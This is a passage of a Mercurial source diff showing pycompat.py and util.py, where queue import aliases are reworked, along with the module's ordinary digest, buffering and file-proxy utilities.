1742 1752 """microbenchmark ui.write
1743 1753 """
1744 1754 timer, fm = gettimer(ui, opts)
1745 1755 def write():
1746 1756 for i in range(100000):
1747 1757 ui.write(('Testing write performance\n'))
1748 1758 timer(write)
1749 1759 fm.end()
1750 1760
1751 1761 def uisetup(ui):
1752 1762 if (util.safehasattr(cmdutil, 'openrevlog') and
1753 1763 not util.safehasattr(commands, 'debugrevlogopts')):
1754 1764 # for "historical portability":
1755 1765 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1756 1766 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1757 1767 # openrevlog() should cause failure, because it has been
1758 1768 # available since 3.5 (or 49c583ca48c4).
1759 1769 def openrevlog(orig, repo, cmd, file_, opts):
1760 1770 if opts.get('dir') and not util.safehasattr(repo, 'dirlog'):
1761 1771 raise error.Abort("This version doesn't support --dir option",
1762 1772 hint="use 3.5 or later")
1763 1773 return orig(repo, cmd, file_, opts)
1764 1774 extensions.wrapfunction(cmdutil, 'openrevlog', openrevlog)
@@ -1,389 +1,386 b''
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import inspect
15 15 import os
16 16 import shlex
17 17 import sys
18 18
19 19 ispy3 = (sys.version_info[0] >= 3)
20 20 ispypy = (r'__pypy__' in sys.builtin_module_names)
21 21
22 22 if not ispy3:
23 23 import cookielib
24 24 import cPickle as pickle
25 25 import httplib
26 import Queue as _queue
26 import Queue as queue
27 27 import SocketServer as socketserver
28 28 import xmlrpclib
29 29
30 30 from .thirdparty.concurrent import futures
31 31
32 32 def future_set_exception_info(f, exc_info):
33 33 f.set_exception_info(*exc_info)
34 34 else:
35 35 import concurrent.futures as futures
36 36 import http.cookiejar as cookielib
37 37 import http.client as httplib
38 38 import pickle
39 import queue as _queue
39 import queue as queue
40 40 import socketserver
41 41 import xmlrpc.client as xmlrpclib
42 42
43 43 def future_set_exception_info(f, exc_info):
44 44 f.set_exception(exc_info[0])
45 45
46 empty = _queue.Empty
47 queue = _queue.Queue
48
49 46 def identity(a):
50 47 return a
51 48
52 49 if ispy3:
53 50 import builtins
54 51 import functools
55 52 import io
56 53 import struct
57 54
58 55 fsencode = os.fsencode
59 56 fsdecode = os.fsdecode
60 57 oscurdir = os.curdir.encode('ascii')
61 58 oslinesep = os.linesep.encode('ascii')
62 59 osname = os.name.encode('ascii')
63 60 ospathsep = os.pathsep.encode('ascii')
64 61 ospardir = os.pardir.encode('ascii')
65 62 ossep = os.sep.encode('ascii')
66 63 osaltsep = os.altsep
67 64 if osaltsep:
68 65 osaltsep = osaltsep.encode('ascii')
69 66 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
70 67 # returns bytes.
71 68 getcwd = os.getcwdb
72 69 sysplatform = sys.platform.encode('ascii')
73 70 sysexecutable = sys.executable
74 71 if sysexecutable:
75 72 sysexecutable = os.fsencode(sysexecutable)
76 73 bytesio = io.BytesIO
77 74 # TODO deprecate stringio name, as it is a lie on Python 3.
78 75 stringio = bytesio
79 76
80 77 def maplist(*args):
81 78 return list(map(*args))
82 79
83 80 def rangelist(*args):
84 81 return list(range(*args))
85 82
86 83 def ziplist(*args):
87 84 return list(zip(*args))
88 85
89 86 rawinput = input
90 87 getargspec = inspect.getfullargspec
91 88
92 89 # TODO: .buffer might not exist if std streams were replaced; we'll need
93 90 # a silly wrapper to make a bytes stream backed by a unicode one.
94 91 stdin = sys.stdin.buffer
95 92 stdout = sys.stdout.buffer
96 93 stderr = sys.stderr.buffer
97 94
98 95 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
99 96 # we can use os.fsencode() to get back bytes argv.
100 97 #
101 98 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
102 99 #
103 100 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
104 101 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
105 102 if getattr(sys, 'argv', None) is not None:
106 103 sysargv = list(map(os.fsencode, sys.argv))
107 104
108 105 bytechr = struct.Struct('>B').pack
109 106 byterepr = b'%r'.__mod__
110 107
111 108 class bytestr(bytes):
112 109 """A bytes which mostly acts as a Python 2 str
113 110
114 111 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
115 112 ('', 'foo', 'ascii', '1')
116 113 >>> s = bytestr(b'foo')
117 114 >>> assert s is bytestr(s)
118 115
119 116 __bytes__() should be called if provided:
120 117
121 118 >>> class bytesable(object):
122 119 ... def __bytes__(self):
123 120 ... return b'bytes'
124 121 >>> bytestr(bytesable())
125 122 'bytes'
126 123
127 124 There's no implicit conversion from non-ascii str as its encoding is
128 125 unknown:
129 126
130 127 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
131 128 Traceback (most recent call last):
132 129 ...
133 130 UnicodeEncodeError: ...
134 131
135 132 Comparison between bytestr and bytes should work:
136 133
137 134 >>> assert bytestr(b'foo') == b'foo'
138 135 >>> assert b'foo' == bytestr(b'foo')
139 136 >>> assert b'f' in bytestr(b'foo')
140 137 >>> assert bytestr(b'f') in b'foo'
141 138
142 139 Sliced elements should be bytes, not integer:
143 140
144 141 >>> s[1], s[:2]
145 142 (b'o', b'fo')
146 143 >>> list(s), list(reversed(s))
147 144 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
148 145
149 146 As bytestr type isn't propagated across operations, you need to cast
150 147 bytes to bytestr explicitly:
151 148
152 149 >>> s = bytestr(b'foo').upper()
153 150 >>> t = bytestr(s)
154 151 >>> s[0], t[0]
155 152 (70, b'F')
156 153
157 154 Be careful to not pass a bytestr object to a function which expects
158 155 bytearray-like behavior.
159 156
160 157 >>> t = bytes(t) # cast to bytes
161 158 >>> assert type(t) is bytes
162 159 """
163 160
164 161 def __new__(cls, s=b''):
165 162 if isinstance(s, bytestr):
166 163 return s
167 164 if (not isinstance(s, (bytes, bytearray))
168 165 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
169 166 s = str(s).encode(u'ascii')
170 167 return bytes.__new__(cls, s)
171 168
172 169 def __getitem__(self, key):
173 170 s = bytes.__getitem__(self, key)
174 171 if not isinstance(s, bytes):
175 172 s = bytechr(s)
176 173 return s
177 174
178 175 def __iter__(self):
179 176 return iterbytestr(bytes.__iter__(self))
180 177
181 178 def __repr__(self):
182 179 return bytes.__repr__(self)[1:] # drop b''
183 180
184 181 def iterbytestr(s):
185 182 """Iterate bytes as if it were a str object of Python 2"""
186 183 return map(bytechr, s)
187 184
188 185 def maybebytestr(s):
189 186 """Promote bytes to bytestr"""
190 187 if isinstance(s, bytes):
191 188 return bytestr(s)
192 189 return s
193 190
194 191 def sysbytes(s):
195 192 """Convert an internal str (e.g. keyword, __doc__) back to bytes
196 193
197 194 This never raises UnicodeEncodeError, but only ASCII characters
198 195 can be round-trip by sysstr(sysbytes(s)).
199 196 """
200 197 return s.encode(u'utf-8')
201 198
202 199 def sysstr(s):
203 200 """Return a keyword str to be passed to Python functions such as
204 201 getattr() and str.encode()
205 202
206 203 This never raises UnicodeDecodeError. Non-ascii characters are
207 204 considered invalid and mapped to arbitrary but unique code points
208 205 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
209 206 """
210 207 if isinstance(s, builtins.str):
211 208 return s
212 209 return s.decode(u'latin-1')
213 210
214 211 def strurl(url):
215 212 """Converts a bytes url back to str"""
216 213 if isinstance(url, bytes):
217 214 return url.decode(u'ascii')
218 215 return url
219 216
220 217 def bytesurl(url):
221 218 """Converts a str url to bytes by encoding in ascii"""
222 219 if isinstance(url, str):
223 220 return url.encode(u'ascii')
224 221 return url
225 222
226 223 def raisewithtb(exc, tb):
227 224 """Raise exception with the given traceback"""
228 225 raise exc.with_traceback(tb)
229 226
230 227 def getdoc(obj):
231 228 """Get docstring as bytes; may be None so gettext() won't confuse it
232 229 with _('')"""
233 230 doc = getattr(obj, u'__doc__', None)
234 231 if doc is None:
235 232 return doc
236 233 return sysbytes(doc)
237 234
238 235 def _wrapattrfunc(f):
239 236 @functools.wraps(f)
240 237 def w(object, name, *args):
241 238 return f(object, sysstr(name), *args)
242 239 return w
243 240
244 241 # these wrappers are automagically imported by hgloader
245 242 delattr = _wrapattrfunc(builtins.delattr)
246 243 getattr = _wrapattrfunc(builtins.getattr)
247 244 hasattr = _wrapattrfunc(builtins.hasattr)
248 245 setattr = _wrapattrfunc(builtins.setattr)
249 246 xrange = builtins.range
250 247 unicode = str
251 248
252 249 def open(name, mode='r', buffering=-1, encoding=None):
253 250 return builtins.open(name, sysstr(mode), buffering, encoding)
254 251
255 252 safehasattr = _wrapattrfunc(builtins.hasattr)
256 253
257 254 def _getoptbwrapper(orig, args, shortlist, namelist):
258 255 """
259 256 Takes bytes arguments, converts them to unicode, pass them to
260 257 getopt.getopt(), convert the returned values back to bytes and then
261 258 return them for Python 3 compatibility as getopt.getopt() don't accepts
262 259 bytes on Python 3.
263 260 """
264 261 args = [a.decode('latin-1') for a in args]
265 262 shortlist = shortlist.decode('latin-1')
266 263 namelist = [a.decode('latin-1') for a in namelist]
267 264 opts, args = orig(args, shortlist, namelist)
268 265 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
269 266 for a in opts]
270 267 args = [a.encode('latin-1') for a in args]
271 268 return opts, args
272 269
273 270 def strkwargs(dic):
274 271 """
275 272 Converts the keys of a python dictonary to str i.e. unicodes so that
276 273 they can be passed as keyword arguments as dictonaries with bytes keys
277 274 can't be passed as keyword arguments to functions on Python 3.
278 275 """
279 276 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
280 277 return dic
281 278
282 279 def byteskwargs(dic):
283 280 """
284 281 Converts keys of python dictonaries to bytes as they were converted to
285 282 str to pass that dictonary as a keyword argument on Python 3.
286 283 """
287 284 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
288 285 return dic
289 286
290 287 # TODO: handle shlex.shlex().
291 288 def shlexsplit(s, comments=False, posix=True):
292 289 """
293 290 Takes bytes argument, convert it to str i.e. unicodes, pass that into
294 291 shlex.split(), convert the returned value to bytes and return that for
295 292 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
296 293 """
297 294 ret = shlex.split(s.decode('latin-1'), comments, posix)
298 295 return [a.encode('latin-1') for a in ret]
299 296
300 297 def emailparser(*args, **kwargs):
301 298 import email.parser
302 299 return email.parser.BytesParser(*args, **kwargs)
303 300
304 301 else:
305 302 import cStringIO
306 303
307 304 bytechr = chr
308 305 byterepr = repr
309 306 bytestr = str
310 307 iterbytestr = iter
311 308 maybebytestr = identity
312 309 sysbytes = identity
313 310 sysstr = identity
314 311 strurl = identity
315 312 bytesurl = identity
316 313
317 314 # this can't be parsed on Python 3
318 315 exec('def raisewithtb(exc, tb):\n'
319 316 ' raise exc, None, tb\n')
320 317
321 318 def fsencode(filename):
322 319 """
323 320 Partial backport from os.py in Python 3, which only accepts bytes.
324 321 In Python 2, our paths should only ever be bytes, a unicode path
325 322 indicates a bug.
326 323 """
327 324 if isinstance(filename, str):
328 325 return filename
329 326 else:
330 327 raise TypeError(
331 328 "expect str, not %s" % type(filename).__name__)
332 329
333 330 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
334 331 # better not to touch Python 2 part as it's already working fine.
335 332 fsdecode = identity
336 333
337 334 def getdoc(obj):
338 335 return getattr(obj, '__doc__', None)
339 336
340 337 _notset = object()
341 338
342 339 def safehasattr(thing, attr):
343 340 return getattr(thing, attr, _notset) is not _notset
344 341
345 342 def _getoptbwrapper(orig, args, shortlist, namelist):
346 343 return orig(args, shortlist, namelist)
347 344
348 345 strkwargs = identity
349 346 byteskwargs = identity
350 347
351 348 oscurdir = os.curdir
352 349 oslinesep = os.linesep
353 350 osname = os.name
354 351 ospathsep = os.pathsep
355 352 ospardir = os.pardir
356 353 ossep = os.sep
357 354 osaltsep = os.altsep
358 355 stdin = sys.stdin
359 356 stdout = sys.stdout
360 357 stderr = sys.stderr
361 358 if getattr(sys, 'argv', None) is not None:
362 359 sysargv = sys.argv
363 360 sysplatform = sys.platform
364 361 getcwd = os.getcwd
365 362 sysexecutable = sys.executable
366 363 shlexsplit = shlex.split
367 364 bytesio = cStringIO.StringIO
368 365 stringio = bytesio
369 366 maplist = map
370 367 rangelist = range
371 368 ziplist = zip
372 369 rawinput = raw_input
373 370 getargspec = inspect.getargspec
374 371
375 372 def emailparser(*args, **kwargs):
376 373 import email.parser
377 374 return email.parser.Parser(*args, **kwargs)
378 375
379 376 isjython = sysplatform.startswith('java')
380 377
381 378 isdarwin = sysplatform == 'darwin'
382 379 isposix = osname == 'posix'
383 380 iswindows = osname == 'nt'
384 381
385 382 def getoptb(args, shortlist, namelist):
386 383 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
387 384
388 385 def gnugetoptb(args, shortlist, namelist):
389 386 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
@@ -1,3876 +1,3874 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import tempfile
35 35 import time
36 36 import traceback
37 37 import warnings
38 38 import zlib
39 39
40 40 from . import (
41 41 encoding,
42 42 error,
43 43 i18n,
44 44 node as nodemod,
45 45 policy,
46 46 pycompat,
47 47 urllibcompat,
48 48 )
49 49 from .utils import (
50 50 dateutil,
51 51 procutil,
52 52 stringutil,
53 53 )
54 54
55 55 base85 = policy.importmod(r'base85')
56 56 osutil = policy.importmod(r'osutil')
57 57 parsers = policy.importmod(r'parsers')
58 58
59 59 b85decode = base85.b85decode
60 60 b85encode = base85.b85encode
61 61
62 62 cookielib = pycompat.cookielib
63 empty = pycompat.empty
64 63 httplib = pycompat.httplib
65 64 pickle = pycompat.pickle
66 queue = pycompat.queue
67 65 safehasattr = pycompat.safehasattr
68 66 socketserver = pycompat.socketserver
69 67 bytesio = pycompat.bytesio
70 68 # TODO deprecate stringio name, as it is a lie on Python 3.
71 69 stringio = bytesio
72 70 xmlrpclib = pycompat.xmlrpclib
73 71
74 72 httpserver = urllibcompat.httpserver
75 73 urlerr = urllibcompat.urlerr
76 74 urlreq = urllibcompat.urlreq
77 75
78 76 # workaround for win32mbcs
79 77 _filenamebytestr = pycompat.bytestr
80 78
81 79 if pycompat.iswindows:
82 80 from . import windows as platform
83 81 else:
84 82 from . import posix as platform
85 83
86 84 _ = i18n._
87 85
88 86 bindunixsocket = platform.bindunixsocket
89 87 cachestat = platform.cachestat
90 88 checkexec = platform.checkexec
91 89 checklink = platform.checklink
92 90 copymode = platform.copymode
93 91 expandglobs = platform.expandglobs
94 92 getfsmountpoint = platform.getfsmountpoint
95 93 getfstype = platform.getfstype
96 94 groupmembers = platform.groupmembers
97 95 groupname = platform.groupname
98 96 isexec = platform.isexec
99 97 isowner = platform.isowner
100 98 listdir = osutil.listdir
101 99 localpath = platform.localpath
102 100 lookupreg = platform.lookupreg
103 101 makedir = platform.makedir
104 102 nlinks = platform.nlinks
105 103 normpath = platform.normpath
106 104 normcase = platform.normcase
107 105 normcasespec = platform.normcasespec
108 106 normcasefallback = platform.normcasefallback
109 107 openhardlinks = platform.openhardlinks
110 108 oslink = platform.oslink
111 109 parsepatchoutput = platform.parsepatchoutput
112 110 pconvert = platform.pconvert
113 111 poll = platform.poll
114 112 posixfile = platform.posixfile
115 113 rename = platform.rename
116 114 removedirs = platform.removedirs
117 115 samedevice = platform.samedevice
118 116 samefile = platform.samefile
119 117 samestat = platform.samestat
120 118 setflags = platform.setflags
121 119 split = platform.split
122 120 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 121 statisexec = platform.statisexec
124 122 statislink = platform.statislink
125 123 umask = platform.umask
126 124 unlink = platform.unlink
127 125 username = platform.username
128 126
129 127 try:
130 128 recvfds = osutil.recvfds
131 129 except AttributeError:
132 130 pass
133 131
134 132 # Python compatibility
135 133
136 134 _notset = object()
137 135
138 136 def _rapply(f, xs):
139 137 if xs is None:
140 138 # assume None means non-value of optional data
141 139 return xs
142 140 if isinstance(xs, (list, set, tuple)):
143 141 return type(xs)(_rapply(f, x) for x in xs)
144 142 if isinstance(xs, dict):
145 143 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
146 144 return f(xs)
147 145
148 146 def rapply(f, xs):
149 147 """Apply function recursively to every item preserving the data structure
150 148
151 149 >>> def f(x):
152 150 ... return 'f(%s)' % x
153 151 >>> rapply(f, None) is None
154 152 True
155 153 >>> rapply(f, 'a')
156 154 'f(a)'
157 155 >>> rapply(f, {'a'}) == {'f(a)'}
158 156 True
159 157 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
160 158 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
161 159
162 160 >>> xs = [object()]
163 161 >>> rapply(pycompat.identity, xs) is xs
164 162 True
165 163 """
166 164 if f is pycompat.identity:
167 165 # fast path mainly for py2
168 166 return xs
169 167 return _rapply(f, xs)
170 168
171 169 def bitsfrom(container):
172 170 bits = 0
173 171 for bit in container:
174 172 bits |= bit
175 173 return bits
176 174
177 175 # python 2.6 still have deprecation warning enabled by default. We do not want
178 176 # to display anything to standard user so detect if we are running test and
179 177 # only use python deprecation warning in this case.
180 178 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
181 179 if _dowarn:
182 180 # explicitly unfilter our warning for python 2.7
183 181 #
184 182 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 183 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 184 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 185 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
189 187 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
190 188 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
191 189 if _dowarn and pycompat.ispy3:
192 190 # silence warning emitted by passing user string to re.sub()
193 191 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
194 192 r'mercurial')
195 193 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
196 194 DeprecationWarning, r'mercurial')
197 195 # TODO: reinvent imp.is_frozen()
198 196 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
199 197 DeprecationWarning, r'mercurial')
200 198
201 199 def nouideprecwarn(msg, version, stacklevel=1):
202 200 """Issue an python native deprecation warning
203 201
204 202 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
205 203 """
206 204 if _dowarn:
207 205 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
208 206 " update your code.)") % version
209 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
210 208
211 209 DIGESTS = {
212 210 'md5': hashlib.md5,
213 211 'sha1': hashlib.sha1,
214 212 'sha512': hashlib.sha512,
215 213 }
216 214 # List of digest types from strongest to weakest
217 215 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
218 216
219 217 for k in DIGESTS_BY_STRENGTH:
220 218 assert k in DIGESTS
221 219
222 220 class digester(object):
223 221 """helper to compute digests.
224 222
225 223 This helper can be used to compute one or more digests given their name.
226 224
227 225 >>> d = digester([b'md5', b'sha1'])
228 226 >>> d.update(b'foo')
229 227 >>> [k for k in sorted(d)]
230 228 ['md5', 'sha1']
231 229 >>> d[b'md5']
232 230 'acbd18db4cc2f85cedef654fccc4a4d8'
233 231 >>> d[b'sha1']
234 232 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
235 233 >>> digester.preferred([b'md5', b'sha1'])
236 234 'sha1'
237 235 """
238 236
239 237 def __init__(self, digests, s=''):
240 238 self._hashes = {}
241 239 for k in digests:
242 240 if k not in DIGESTS:
243 241 raise error.Abort(_('unknown digest type: %s') % k)
244 242 self._hashes[k] = DIGESTS[k]()
245 243 if s:
246 244 self.update(s)
247 245
248 246 def update(self, data):
249 247 for h in self._hashes.values():
250 248 h.update(data)
251 249
252 250 def __getitem__(self, key):
253 251 if key not in DIGESTS:
254 252 raise error.Abort(_('unknown digest type: %s') % k)
255 253 return nodemod.hex(self._hashes[key].digest())
256 254
257 255 def __iter__(self):
258 256 return iter(self._hashes)
259 257
260 258 @staticmethod
261 259 def preferred(supported):
262 260 """returns the strongest digest type in both supported and DIGESTS."""
263 261
264 262 for k in DIGESTS_BY_STRENGTH:
265 263 if k in supported:
266 264 return k
267 265 return None
268 266
269 267 class digestchecker(object):
270 268 """file handle wrapper that additionally checks content against a given
271 269 size and digests.
272 270
273 271 d = digestchecker(fh, size, {'md5': '...'})
274 272
275 273 When multiple digests are given, all of them are validated.
276 274 """
277 275
278 276 def __init__(self, fh, size, digests):
279 277 self._fh = fh
280 278 self._size = size
281 279 self._got = 0
282 280 self._digests = dict(digests)
283 281 self._digester = digester(self._digests.keys())
284 282
285 283 def read(self, length=-1):
286 284 content = self._fh.read(length)
287 285 self._digester.update(content)
288 286 self._got += len(content)
289 287 return content
290 288
291 289 def validate(self):
292 290 if self._size != self._got:
293 291 raise error.Abort(_('size mismatch: expected %d, got %d') %
294 292 (self._size, self._got))
295 293 for k, v in self._digests.items():
296 294 if v != self._digester[k]:
297 295 # i18n: first parameter is a digest name
298 296 raise error.Abort(_('%s mismatch: expected %s, got %s') %
299 297 (k, v, self._digester[k]))
300 298
301 299 try:
302 300 buffer = buffer
303 301 except NameError:
304 302 def buffer(sliceable, offset=0, length=None):
305 303 if length is not None:
306 304 return memoryview(sliceable)[offset:offset + length]
307 305 return memoryview(sliceable)[offset:]
308 306
309 307 _chunksize = 4096
310 308
311 309 class bufferedinputpipe(object):
312 310 """a manually buffered input pipe
313 311
314 312 Python will not let us use buffered IO and lazy reading with 'polling' at
315 313 the same time. We cannot probe the buffer state and select will not detect
316 314 that data are ready to read if they are already buffered.
317 315
318 316 This class let us work around that by implementing its own buffering
319 317 (allowing efficient readline) while offering a way to know if the buffer is
320 318 empty from the output (allowing collaboration of the buffer with polling).
321 319
322 320 This class lives in the 'util' module because it makes use of the 'os'
323 321 module from the python stdlib.
324 322 """
325 323 def __new__(cls, fh):
326 324 # If we receive a fileobjectproxy, we need to use a variation of this
327 325 # class that notifies observers about activity.
328 326 if isinstance(fh, fileobjectproxy):
329 327 cls = observedbufferedinputpipe
330 328
331 329 return super(bufferedinputpipe, cls).__new__(cls)
332 330
333 331 def __init__(self, input):
334 332 self._input = input
335 333 self._buffer = []
336 334 self._eof = False
337 335 self._lenbuf = 0
338 336
339 337 @property
340 338 def hasbuffer(self):
341 339 """True is any data is currently buffered
342 340
343 341 This will be used externally a pre-step for polling IO. If there is
344 342 already data then no polling should be set in place."""
345 343 return bool(self._buffer)
346 344
347 345 @property
348 346 def closed(self):
349 347 return self._input.closed
350 348
351 349 def fileno(self):
352 350 return self._input.fileno()
353 351
354 352 def close(self):
355 353 return self._input.close()
356 354
357 355 def read(self, size):
358 356 while (not self._eof) and (self._lenbuf < size):
359 357 self._fillbuffer()
360 358 return self._frombuffer(size)
361 359
362 360 def readline(self, *args, **kwargs):
363 361 if 1 < len(self._buffer):
364 362 # this should not happen because both read and readline end with a
365 363 # _frombuffer call that collapse it.
366 364 self._buffer = [''.join(self._buffer)]
367 365 self._lenbuf = len(self._buffer[0])
368 366 lfi = -1
369 367 if self._buffer:
370 368 lfi = self._buffer[-1].find('\n')
371 369 while (not self._eof) and lfi < 0:
372 370 self._fillbuffer()
373 371 if self._buffer:
374 372 lfi = self._buffer[-1].find('\n')
375 373 size = lfi + 1
376 374 if lfi < 0: # end of file
377 375 size = self._lenbuf
378 376 elif 1 < len(self._buffer):
379 377 # we need to take previous chunks into account
380 378 size += self._lenbuf - len(self._buffer[-1])
381 379 return self._frombuffer(size)
382 380
383 381 def _frombuffer(self, size):
384 382 """return at most 'size' data from the buffer
385 383
386 384 The data are removed from the buffer."""
387 385 if size == 0 or not self._buffer:
388 386 return ''
389 387 buf = self._buffer[0]
390 388 if 1 < len(self._buffer):
391 389 buf = ''.join(self._buffer)
392 390
393 391 data = buf[:size]
394 392 buf = buf[len(data):]
395 393 if buf:
396 394 self._buffer = [buf]
397 395 self._lenbuf = len(buf)
398 396 else:
399 397 self._buffer = []
400 398 self._lenbuf = 0
401 399 return data
402 400
403 401 def _fillbuffer(self):
404 402 """read data to the buffer"""
405 403 data = os.read(self._input.fileno(), _chunksize)
406 404 if not data:
407 405 self._eof = True
408 406 else:
409 407 self._lenbuf += len(data)
410 408 self._buffer.append(data)
411 409
412 410 return data
413 411
414 412 def mmapread(fp):
415 413 try:
416 414 fd = getattr(fp, 'fileno', lambda: fp)()
417 415 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 416 except ValueError:
419 417 # Empty files cannot be mmapped, but mmapread should still work. Check
420 418 # if the file is empty, and if so, return an empty buffer.
421 419 if os.fstat(fd).st_size == 0:
422 420 return ''
423 421 raise
424 422
425 423 class fileobjectproxy(object):
426 424 """A proxy around file objects that tells a watcher when events occur.
427 425
428 426 This type is intended to only be used for testing purposes. Think hard
429 427 before using it in important code.
430 428 """
431 429 __slots__ = (
432 430 r'_orig',
433 431 r'_observer',
434 432 )
435 433
436 434 def __init__(self, fh, observer):
437 435 object.__setattr__(self, r'_orig', fh)
438 436 object.__setattr__(self, r'_observer', observer)
439 437
440 438 def __getattribute__(self, name):
441 439 ours = {
442 440 r'_observer',
443 441
444 442 # IOBase
445 443 r'close',
446 444 # closed if a property
447 445 r'fileno',
448 446 r'flush',
449 447 r'isatty',
450 448 r'readable',
451 449 r'readline',
452 450 r'readlines',
453 451 r'seek',
454 452 r'seekable',
455 453 r'tell',
456 454 r'truncate',
457 455 r'writable',
458 456 r'writelines',
459 457 # RawIOBase
460 458 r'read',
461 459 r'readall',
462 460 r'readinto',
463 461 r'write',
464 462 # BufferedIOBase
465 463 # raw is a property
466 464 r'detach',
467 465 # read defined above
468 466 r'read1',
469 467 # readinto defined above
470 468 # write defined above
471 469 }
472 470
473 471 # We only observe some methods.
474 472 if name in ours:
475 473 return object.__getattribute__(self, name)
476 474
477 475 return getattr(object.__getattribute__(self, r'_orig'), name)
478 476
479 477 def __nonzero__(self):
480 478 return bool(object.__getattribute__(self, r'_orig'))
481 479
482 480 __bool__ = __nonzero__
483 481
484 482 def __delattr__(self, name):
485 483 return delattr(object.__getattribute__(self, r'_orig'), name)
486 484
487 485 def __setattr__(self, name, value):
488 486 return setattr(object.__getattribute__(self, r'_orig'), name, value)
489 487
490 488 def __iter__(self):
491 489 return object.__getattribute__(self, r'_orig').__iter__()
492 490
493 491 def _observedcall(self, name, *args, **kwargs):
494 492 # Call the original object.
495 493 orig = object.__getattribute__(self, r'_orig')
496 494 res = getattr(orig, name)(*args, **kwargs)
497 495
498 496 # Call a method on the observer of the same name with arguments
499 497 # so it can react, log, etc.
500 498 observer = object.__getattribute__(self, r'_observer')
501 499 fn = getattr(observer, name, None)
502 500 if fn:
503 501 fn(res, *args, **kwargs)
504 502
505 503 return res
506 504
507 505 def close(self, *args, **kwargs):
508 506 return object.__getattribute__(self, r'_observedcall')(
509 507 r'close', *args, **kwargs)
510 508
511 509 def fileno(self, *args, **kwargs):
512 510 return object.__getattribute__(self, r'_observedcall')(
513 511 r'fileno', *args, **kwargs)
514 512
515 513 def flush(self, *args, **kwargs):
516 514 return object.__getattribute__(self, r'_observedcall')(
517 515 r'flush', *args, **kwargs)
518 516
519 517 def isatty(self, *args, **kwargs):
520 518 return object.__getattribute__(self, r'_observedcall')(
521 519 r'isatty', *args, **kwargs)
522 520
523 521 def readable(self, *args, **kwargs):
524 522 return object.__getattribute__(self, r'_observedcall')(
525 523 r'readable', *args, **kwargs)
526 524
527 525 def readline(self, *args, **kwargs):
528 526 return object.__getattribute__(self, r'_observedcall')(
529 527 r'readline', *args, **kwargs)
530 528
531 529 def readlines(self, *args, **kwargs):
532 530 return object.__getattribute__(self, r'_observedcall')(
533 531 r'readlines', *args, **kwargs)
534 532
535 533 def seek(self, *args, **kwargs):
536 534 return object.__getattribute__(self, r'_observedcall')(
537 535 r'seek', *args, **kwargs)
538 536
539 537 def seekable(self, *args, **kwargs):
540 538 return object.__getattribute__(self, r'_observedcall')(
541 539 r'seekable', *args, **kwargs)
542 540
543 541 def tell(self, *args, **kwargs):
544 542 return object.__getattribute__(self, r'_observedcall')(
545 543 r'tell', *args, **kwargs)
546 544
547 545 def truncate(self, *args, **kwargs):
548 546 return object.__getattribute__(self, r'_observedcall')(
549 547 r'truncate', *args, **kwargs)
550 548
551 549 def writable(self, *args, **kwargs):
552 550 return object.__getattribute__(self, r'_observedcall')(
553 551 r'writable', *args, **kwargs)
554 552
555 553 def writelines(self, *args, **kwargs):
556 554 return object.__getattribute__(self, r'_observedcall')(
557 555 r'writelines', *args, **kwargs)
558 556
